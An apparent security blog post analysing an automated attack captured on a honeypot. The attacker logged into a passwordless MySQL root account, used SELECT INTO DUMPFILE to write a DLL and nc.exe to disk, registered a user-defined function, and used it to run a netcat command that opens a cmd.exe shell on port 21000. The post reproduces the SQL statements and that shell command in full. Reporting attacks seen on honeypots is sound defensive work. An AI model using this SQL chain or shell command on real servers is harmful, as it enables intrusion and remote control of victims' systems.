Cool but stupid attack

I found an interessting attack on one of the honeypots the other day. A miscreant used a MySQL server with no password and dropped two files on the operation system.

First, the attacker opened a connection to tcp-3306 and logged in as root. Then created a table “FILENAME”:

CREATE TABLE FILEDATA(FILEDATA Blob NOT NULL) TYPE=MyISAM;

Then a INSERT to this table:

INSERT INTO FILEDATA (FILEDATA) VALUES(0x4D5A9000[...]

                                         ^^

                                         MZ

(PE file)

And dumps the file:

SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'C:\\winnt\\system32\\shell64.dll'

SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'D:\\winnt\\system32\\shell64.dll'

SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'E:\\winnt\\system32\\shell64.dll'

Drops the FILEDATA table, then open it again, new INSERT, another PE file. This file is stored on the system as:

SELECT FILEDATA FROM FILEDATA INTO DUMPFILE 'C:\\nc.exe';

New function in MySQL:

CREATE FUNCTION my_name returns STRING soname 'shell64';

And tries to open it:

select my_name('start cmd.exe /c c:\\nc.exe -l -p 21000 -t -d -e cmd.exe');

md5sum – 50e774a0e95adfac0965fbb28369526f shell64.dll

A quick look on this file reveals that’s packed with UPX 1.92 (runtime packer), but the content is not very interessting. It has a reference to test2.dll and exports a function called “my_name“. It look like a test to see if the attack was successful or not. my_name locates command.com or cmd.exe

With other words, the miscreant tries to open a cmd.exe shell on tcp-21000. The attack is all done in 3 seconds. I guess it’s a automated attack. To bad my system was a unix system, and not a Windows system :)

Thanks to the team for analyzing this attack.